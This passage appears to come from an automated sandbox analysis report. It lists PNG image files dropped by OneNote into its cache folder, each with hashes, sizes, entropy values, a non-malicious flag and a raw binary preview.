                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
